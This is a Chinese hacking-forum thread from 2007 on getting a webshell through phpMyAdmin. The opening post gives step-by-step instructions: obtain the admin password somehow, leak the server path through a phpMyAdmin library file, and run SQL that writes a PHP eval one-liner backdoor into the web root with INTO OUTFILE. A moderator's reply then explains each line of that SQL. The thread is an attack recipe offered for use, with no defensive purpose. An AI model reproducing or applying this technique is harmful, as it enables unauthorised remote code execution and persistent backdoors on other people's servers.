phpMyAdmin 后台拿webshell

猪猪

Wei.H

论坛-管理员

Rank: 15

岁月联盟 - 最高管理

终身成就勋章优秀管理勋章核心成员

1^# 大中小发表于 2007-6-27 09:46 只看该作者

phpMyAdmin 后台拿webshell

1.如何拿到登陆密码. 自己想办法

2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.

3.选择一个Database.运行以下语句.

复制内容到剪贴板

代码:

----start code---

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');

select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';

Drop TABLE IF EXISTS a;

----end code---

4.如果没什么意外.对应网站得到webshell

TOP

nmhack

信息军队-上等兵

Rank: 2

2^# 大中小发表于 2007-6-27 10:46 只看该作者

看不懂啊郁闷...........................

TOP

晓华

岁月联盟正式成员

论坛-版主

Rank: 13

歲月聯盟信息安全團隊员

资料收集勋章正式成员

3^# 大中小发表于 2007-7-13 19:09 只看该作者

我来解释下吧。
----start code---
Create TABLE a (cmd text NOT NULL);新建一个表
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');把PHP的一句话木马插入到刚刚建的表
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php'; 然后导出到'D:/phpMyAdmin/libraries/d.php'的目标位置
Drop TABLE IF EXISTS a; 删除表
----end code---
大概就是那个意思。解释得不好，大虾别笑。

TOP

‹‹ 上一主题 | 下一主题 ››